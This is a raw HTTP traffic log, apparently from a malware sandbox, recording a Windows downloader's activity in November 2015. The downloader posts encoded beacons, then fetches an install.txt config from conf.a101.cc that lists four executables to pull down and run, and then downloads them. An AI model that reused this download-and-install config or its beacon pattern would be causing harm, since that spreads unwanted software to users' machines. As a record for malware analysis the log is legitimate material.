P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
POST /commit?cmd=finfo HTTP/1.1
Content-Length: 543
Connection: Keep-Alive
.#4H........................................!#$%&"k." ,-.
3234!~:9:;.i.=@ABK..DGHIBKLMOOPQ.STU_.b[Z[\U.ebabcK/\ehijc'Wlopqv?Nwvwx}4A~}~......................................................................................................... .........?.m.............&'...l..j..._...........5..Pe%......Z..6.......Y...B....4....q...{.k..Q,7.c=(.`^.{...0.r*..&=.z&,...^.......f....!.......z....c..wg...N...{aP. ...7..KZ.?..j.....R.|...:..........Qb_...~l .0.s...o..xf.d.=9...I....E(.y....d."..4t..S...0.@E..Jpz...-...H.;^}..Y....
.M.......
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:13 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00137261760315632138110713
Server: Apache
tracecode: 00137261760315632138110713
Set-Cookie: BAIDUID=67699F784E2A0D23D0594A86343DB7B0:FG=1; expires=Sun, 06-Nov-16 05:00:13 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
POST /query?cmd=validurl HTTP/1.1
Content-Length: 96
Connection: Keep-Alive
.#4H.......4.`d.............................8.>?@)674.ih%$d*<=%'8.1<9z;:40;4s..r..\]PTF..lmno
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:10 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00101112390271667466110713
Server: Apache
tracecode: 00101112390271667466110713
Set-Cookie: BAIDUID=BA43C3B59B01A15F5DD3D9CDD70F255F:FG=1; expires=Sun, 06-Nov-16 05:00:10 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
GET /invc/xfspeed/qqpcmgr/versetup/portal/PCMgr_Setup_10_9_16345_222.exe HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; QQPCMgr7.0)
Host: dlied6.qq.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 302 Found
Server: nws 1.2.15
Connection: close
Date: Sat, 07 Nov 2015 05:00:16 GMT
Expires: Sat, 07 Nov 2015 05:00:16 GMT
Cache-Control: max-age=0
Content-Length: 89
Location: hXXp://103.7.29.215/dlied6.qq.com/invc/xfspeed/qqpcmgr/versetup/portal/PCMgr_Setup_10_9_16345_222.exe?mkey=563da395da60d437&f=2384&p=.exe
The actual URL is '/invc/xfspeed/qqpcmgr/versetup/portal/PCMgr_Setup_10_9_16345_222.exe'...
POST /query?cmd=validurl HTTP/1.1
Content-Length: 125
Connection: Keep-Alive
.#4H.......QC...............................y6...............................................................................
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:02 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00024935640818948618110713
Server: Apache
tracecode: 00024935640818948618110713
Set-Cookie: BAIDUID=B2053B857F2258D2E04896EB7F862B42:FG=1; expires=Sun, 06-Nov-16 05:00:02 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
GET /fcgi-bin/downurlquery?id=71960&guid=CQEjCF9zN8adOLEQHMvLiQgs3ZUZbbIyM0pyzn9CtE/lP8pJq+u226+i+UWFFd+D&ver=8.1.4016.301 HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; QQPCMgr7.0)
Host: c.pc.qq.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Date: Sat, 07 Nov 2015 05:00:15 GMT
Server: HTTP Load Balancer/2.0
Last-Modified: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 672
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
Cache-Control: no-cache
Pragma: no-cache
<<< skipped >>>
GET /17476535.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: js.users.51.la
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: max-age=300
Content-Length: 1862
Content-Type: application/x-javascript
Last-Modified: Fri, 07 Aug 2015 04:22:10 GMT
Accept-Ranges: bytes
ETag: "cc562aa1c8d0d01:339f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 07 Nov 2015 04:44:38 GMT
Connection: close
document.write ('<a href="hXXp://VVV.51.la/?17476535" target="_blank" title="51.La 网站流量统计系统">网站统计</a>\n');..var a6535tf="51la";var a6535pu="";var a6535pf="51la";var a6535su=window.location;var a6535sf=document.referrer;var a6535of="";var a6535op="";var a6535ops=1;var a6535ot=1;var a6535d=new Date();var a6535color="";if (navigator.appName=="Netscape"){a6535color=screen.pixelDepth;} else {a6535color=screen.colorDepth;}..try{a6535tf=top.document.referrer;}catch(e){}..try{a6535pu =window.parent.location;}catch(e){}..try{a6535pf=window.parent.document.referrer;}catch(e){}..try{a6535ops=document.cookie.match(new RegExp("(^| )a6535_pages=([^;]*)(;|$)"));a6535ops=(a6535ops==null)?1: (parseInt(unescape((a6535ops)[2])) 1);var a6535oe =new Date();a6535oe.setTime(a6535oe.getTime() 60*60*1000);document.cookie="a6535_pages=" a6535ops ";path=/;expires=" a6535oe.toGMTString();a6535ot=document.cookie.match(new RegExp("(^| )a6535_times=([^;]*)(;|$)"));if(a6535ot==null){a6535ot=1;}else{a6535ot=parseInt(unescape((a6535ot)[2])); a6535ot=(a6535ops==1)?(a6535ot 1):(a6535ot);}a6535oe.setTime(a6535oe.getTime() 365*24*60*60*1000);document.cookie="a6535_times=" a6535ot ";path=/;expires=" a6535oe.toGMTString();}catch(e){}..try{if(document.cookie==""){a6535ops=-1;a6535ot=-1;}}catch(e){}..a6535of=a6535sf;if(a6535pf!=="51la"){a6535of=a6535pf;}if(a6535tf!=="51la"){a6535of=a6535tf;}a6535op=a6535pu;try{lainframe}catch(e){a6535op=a6535su;}..a6535src=
<<< skipped >>>
POST /query?cmd=url2finfo HTTP/1.1
Content-Length: 102
Connection: Keep-Alive
.#4H.......:R6.f............................77.9:;TIJOznm.)k'78""#b.!".<??=49x..w75<1gXWQM...ghijklmno
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00008958911911494410110713
Server: Apache
tracecode: 00008958911911494410110713
Set-Cookie: BAIDUID=32F3C5706F8B2402BD0EB1E10803435C:FG=1; expires=Sun, 06-Nov-16 05:00:00 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
POST /query?cmd=validurl HTTP/1.1
Content-Length: 114
Connection: Keep-Alive
.#4H.......F..>.............................#.)* DYZ
..W[BX[WX^.OHFV!;#*j&)*g/%9.)!8>~`cefy>6*.:01olYRV[QK..ijkl
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:03 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00033318230271667466110713
Server: Apache
tracecode: 00033318230271667466110713
Set-Cookie: BAIDUID=37CF03EF72C69E44B1D413F21243AFB1:FG=1; expires=Sun, 06-Nov-16 05:00:03 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
POST /query?cmd=validurl HTTP/1.1
Content-Length: 125
Connection: Keep-Alive
.#4H.......QC...............................y6...............................................................................
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00016873191213477898110713
Server: Apache
tracecode: 00016873191213477898110713
Set-Cookie: BAIDUID=69DAC83DF6D595A39DEA8B5044D5BB76:FG=1; expires=Sun, 06-Nov-16 05:00:01 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
GET /package/201511/7c9ddd8b4b286eef807bc97513948574.exe HTTP/1.1
Host: dlsw.br.baidu.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: JSP3/2.0.13
Date: Sat, 07 Nov 2015 05:00:00 GMT
Content-Type: application/octet-stream
Content-Length: 7981400
Connection: keep-alive
ETag: "5638867b-79c958"
Last-Modified: Tue, 03 Nov 2015 10:03:39 GMT
Expires: Fri, 19 Oct 2018 09:08:15 GMT
Age: 244305
Cache-Control: max-age=93312000
Accept-Ranges: bytes
<<< skipped >>>
POST /query?cmd=validurl HTTP/1.1
Content-Length: 117
Connection: Keep-Alive
.#4H.......I.l...........................................................................n.33455381%hdRjcOd`.:pnr....
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:02 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00024709301213477898110713
Server: Apache
tracecode: 00024709301213477898110713
Set-Cookie: BAIDUID=B2053B857F2258D27384FF197E418516:FG=1; expires=Sun, 06-Nov-16 05:00:02 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
POST /query?cmd=validurl HTTP/1.1
Content-Length: 114
Connection: Keep-Alive
.#4H.......F..>.............................#.)* DYZ
..W[BX[WX^.OHFV!;#*j&)*g/%9.)!8>~`cefy>6*.:01olYRV[QK..ijkl
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:04 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00049372701213477898110713
Server: Apache
tracecode: 00049372701213477898110713
Set-Cookie: BAIDUID=6D7EF984AD0193644A842C3587268107:FG=1; expires=Sun, 06-Nov-16 05:00:04 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
POST /query?cmd=url2finfo HTTP/1.1
Content-Length: 131
Connection: Keep-Alive
.#4H.......W.>...............................................................frrfaa)vyyifk.!k.f|.{tr8IHJXXriqLNCG......OSI-./012345
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 04:59:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=35991293201911494410110712
Server: Apache
tracecode: 35991293201911494410110712
Set-Cookie: BAIDUID=005B09C6D83A1A4BB9311240B7EFFFDC:FG=1; expires=Sun, 06-Nov-16 04:59:59 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
GET /tool/install.txt HTTP/1.1
User-Agent: DownUpLoad
Host: conf.a101.cc
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 12:58:57 GMT
Content-Type: application/octet-stream
Content-Length: 344
Last-Modified: Wed, 04 Nov 2015 09:04:40 GMT
Connection: keep-alive
ETag: "5639ca28-158"
Accept-Ranges: bytes
[field0]..url=hXXp://dlied6.qq.com/invc/xfspeed/qqpcmgr/download/QQPCDownload71960.exe..[field1]..url=hXXp://download.suxiazai.com/for_down/2013/install1393485.exe..[field2]..url=hXXp://mm.appkhh.com/mmliao/MM-liao8863.exe..[field3]..url=hXXp://j.br.baidu.com/v1/t/full/p/mini/tn/10003408/ch_dl_url.exe..[common]..number=4..filename=qq|rx|mm|bd..
GET /invc/xfspeed/qqpcmgr/download/QQPCDownload71960.exe HTTP/1.1
Host: dlied6.qq.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Connection: Keep-Alive
HTTP/1.1 302 Found
Server: nws 1.2.15
Connection: close
Date: Sat, 07 Nov 2015 04:59:58 GMT
Expires: Sat, 07 Nov 2015 04:59:58 GMT
Cache-Control: max-age=0
Content-Length: 73
Location: hXXp://203.205.148.185/dlied6.qq.com/invc/xfspeed/qqpcmgr/download/QQPCDownload71960.exe?mkey=563da3bbda60d437&f=1224&p=.exe
The actual URL is '/invc/xfspeed/qqpcmgr/download/QQPCDownload71960.exe'...
POST /query?cmd=validurl HTTP/1.1
Content-Length: 114
Connection: Keep-Alive
.#4H.......F..>.............................#.)* DYZ
..W[BX[WX^.OHFV!;#*j&)*g/%9.)!8>~`cefy>6*.:01olYRV[QK..ijkl
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:11 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00117949801911494410110713
Server: Apache
tracecode: 00117949801911494410110713
Set-Cookie: BAIDUID=2C7B1E2C3C0DA0573611A9CC38E2099E:FG=1; expires=Sun, 06-Nov-16 05:00:11 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
POST /query?cmd=validurl HTTP/1.1
Content-Length: 125
Connection: Keep-Alive
.#4H.......QC...............................y6...............................................................................
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:08 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00080725311213477898110713
Server: Apache
tracecode: 00080725311213477898110713
Set-Cookie: BAIDUID=DA04B4066DA68D7200C3C53637253F4C:FG=1; expires=Sun, 06-Nov-16 05:00:08 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
POST /query?cmd=validurl HTTP/1.1
Content-Length: 96
Connection: Keep-Alive
.#4H.......4.`d.............................8.>?@)674.ih%$d*<=%'8.1<9z;:40;4s..r..\]PTF..lmno
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:10 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00109337490271667466110713
Server: Apache
tracecode: 00109337490271667466110713
Set-Cookie: BAIDUID=BA43C3B59B01A15FE3D46D7CEF95CB13:FG=1; expires=Sun, 06-Nov-16 05:00:10 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
POST /query?cmd=validurl HTTP/1.1
Content-Length: 96
Connection: Keep-Alive
.#4H.......4.`d.............................8.>?@)674.ih%$d*<=%'8.1<9z;:40;4s..r..\]PTF..lmno
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:02 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00025792010818883082110713
Server: Apache
tracecode: 00025792010818883082110713
Set-Cookie: BAIDUID=B2053B857F2258D266D348C433DA33B2:FG=1; expires=Sun, 06-Nov-16 05:00:02 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
POST /query?cmd=url2finfo HTTP/1.1
Content-Length: 120
Connection: Keep-Alive
.#4H.......L..BH............................--./01ZG@E..]ULRQQ^$o16<,'=) d(# a)?#7;"8xjikhs40,....UV_T\Q_E...opqrstuvw
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00008202790818883082110713
Server: Apache
tracecode: 00008202790818883082110713
Set-Cookie: BAIDUID=32F3C5706F8B24028DF67F10D2BD5887:FG=1; expires=Sun, 06-Nov-16 05:00:00 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
GET /ptlogin/v4/style/0/images/icons.gif HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=1&jumpname=&appid=549000912&ptcss=undefined&param=u1%3Dhttp%253A%252F%252Fqun.qzone.qq.com%252Fgroup&css=&mibao_css=&s_url=http%3A%2F%2Fqun.qzone.qq.com%2Fgroup&low_login=0&style=12&authParamUrl=&needVip=1&ptui_version=10028
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 07 Nov 2015 05:00:29 GMT
Server: PWS/8.1.20.25
X-Px: rf-ht h0-s1127.p11-fra ( h0-s1214.p11-fra), ht h0-s1214.p11-fra.cdngp.net
ETag: "5506987c-1ede"
Cache-Control: max-age=7200
Expires: Sat, 07 Nov 2015 05:23:11 GMT
Age: 5838
Content-Length: 7902
Content-Type: image/gif
Last-Modified: Mon, 16 Mar 2015 08:46:52 GMT
Connection: keep-alive
<<< skipped >>>
POST /query?cmd=validurl HTTP/1.1
Content-Length: 117
Connection: Keep-Alive
.#4H.......I.l...........................................................................n.33455381%hdRjcOd`.:pnr....
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:04 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00049406280658453514110713
Server: Apache
tracecode: 00049406280658453514110713
Set-Cookie: BAIDUID=6D7EF984AD0193644126EE9989BC78F5:FG=1; expires=Sun, 06-Nov-16 05:00:04 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
GET /for_down/2013/install1393485.exe HTTP/1.1
Host: download.suxiazai.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 4787104
Date: Thu, 29 Oct 2015 05:44:24 GMT
Content-Type: application/octet-stream
ETag: "a88697daded0d01:608b2"
Server: Microsoft-IIS/6.0
Last-Modified: Fri, 07 Aug 2015 07:01:16 GMT
Accept-Ranges: bytes
X-Powered-By: ASP.NET
Age: 774938
Via: http/1.1 fnop003-GDSTDX-CT-248-102 (ACA/2.0 ACA_HIT), http/1.1 fnop003-ZJHZFY-CT-11-158 (ACA/2.0 ACA_HIT), http/1.1 fnop003-ZJHZFY-CT-11-165 (ACA/2.0 ACA_HIT)
<<< skipped >>>
POST /query?cmd=url2finfo HTTP/1.1
Content-Length: 102
Connection: Keep-Alive
.#4H.......:R6.f............................77.9:;TIJOznm.)k'78""#b.!".<??=49x..w75<1gXWQM...ghijklmno
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 04:59:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=35999987180581376522110712
Server: Apache
tracecode: 35999987180581376522110712
Set-Cookie: BAIDUID=005B09C6D83A1A4B79939E6BDE03F0EE:FG=1; expires=Sun, 06-Nov-16 04:59:59 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
POST /commit?cmd=finfo HTTP/1.1
Content-Length: 700
Connection: Keep-Alive
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:13 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00136416251213477898110713
Server: Apache
tracecode: 00136416251213477898110713
Set-Cookie: BAIDUID=67699F784E2A0D23E0CC41DD2DA72AC7:FG=1; expires=Sun, 06-Nov-16 05:00:13 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
GET /ptlogin/ver/10139/js/xui.js?v=10007 HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=1&jumpname=&appid=549000912&ptcss=undefined&param=u1%3Dhttp%253A%252F%252Fqun.qzone.qq.com%252Fgroup&css=&mibao_css=&s_url=http%3A%2F%2Fqun.qzone.qq.com%2Fgroup&low_login=0&style=12&authParamUrl=&needVip=1&ptui_version=10028
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 07 Nov 2015 05:00:29 GMT
Server: PWS/8.1.20.25
X-Px: ms h0-s1127.p11-fra ( h0-s1129.p11-fra), ht h0-s1129.p11-fra.cdngp.net
ETag: "5636be2e-21f8"
Cache-Control: max-age=600
Expires: Sat, 07 Nov 2015 05:00:41 GMT
Age: 588
Content-Length: 3459
Content-Type: application/x-javascript
Content-Encoding: gzip
Vary: Accept-Encoding
Last-Modified: Mon, 02 Nov 2015 01:36:46 GMT
Connection: keep-alive
<<< skipped >>>
POST /query?cmd=url2finfo HTTP/1.1
Content-Length: 131
Connection: Keep-Alive
.#4H.......W.>...............................................................frrfaa)vyyifk.!k.f|.{tr8IHJXXriqLNCG......OSI-./012345
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00000046110818948618110713
Server: Apache
tracecode: 00000046110818948618110713
Set-Cookie: BAIDUID=32F3C5706F8B2402C2AC3D655372071C:FG=1; expires=Sun, 06-Nov-16 05:00:00 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
POST /query?cmd=url2finfo HTTP/1.1
Content-Length: 120
Connection: Keep-Alive
.#4H.......L..BH............................--./01ZG@E..]ULRQQ^$o16<,'=) d(# a)?#7;"8xjikhs40,....UV_T\Q_E...opqrstuvw
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 04:59:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=35999768410581376522110712
Server: Apache
tracecode: 35999768410581376522110712
Set-Cookie: BAIDUID=005B09C6D83A1A4B4ADDD1A7D9EA5912:FG=1; expires=Sun, 06-Nov-16 04:59:59 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
POST /query?cmd=validurl HTTP/1.1
Content-Length: 125
Connection: Keep-Alive
.#4H.......QC...............................y6...............................................................................
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:06 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00063499440581376522110713
Server: Apache
tracecode: 00063499440581376522110713
Set-Cookie: BAIDUID=FD9EDA96E9FFC3CC09AA604EAEAD5BD2:FG=1; expires=Sun, 06-Nov-16 05:00:06 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
POST /query?cmd=validurl HTTP/1.1
Content-Length: 114
Connection: Keep-Alive
.#4H.......F..>.............................#.)* DYZ
..W[BX[WX^.OHFV!;#*j&)*g/%9.)!8>~`cefy>6*.:01olYRV[QK..ijkl
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:02 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00024854541213477898110713
Server: Apache
tracecode: 00024854541213477898110713
Set-Cookie: BAIDUID=B2053B857F2258D280860D7625D53A9A:FG=1; expires=Sun, 06-Nov-16 05:00:02 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
GET /cgi-bin/report?id=89217 HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=1&jumpname=&appid=549000912&ptcss=undefined&param=u1%3Dhttp%253A%252F%252Fqun.qzone.qq.com%252Fgroup&css=&mibao_css=&s_url=http%3A%2F%2Fqun.qzone.qq.com%2Fgroup&low_login=0&style=12&authParamUrl=&needVip=1&ptui_version=10028
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ui.ptlogin2.qq.com
Connection: Keep-Alive
Cookie: pt_local_token=-1924241393; ptui_qstatus=3
HTTP/1.1 200 OK
Connection: keep-alive
Keep-Alive: timeout=50, max=1024
Server: QZHTTP-2.38.20
Date: Sat, 07 Nov 2015 05:00:30 GMT
Pragma: no-cache
Cache-Control: no-cache; must-revalidate
Content-Type: image/bmp;
Content-Length: 66
GET /View/Home/Task/css.base.css?1.0.247 HTTP/1.1
Accept: */*
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.meiheitou.com
Connection: Keep-Alive
Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065
HTTP/1.1 200 OK
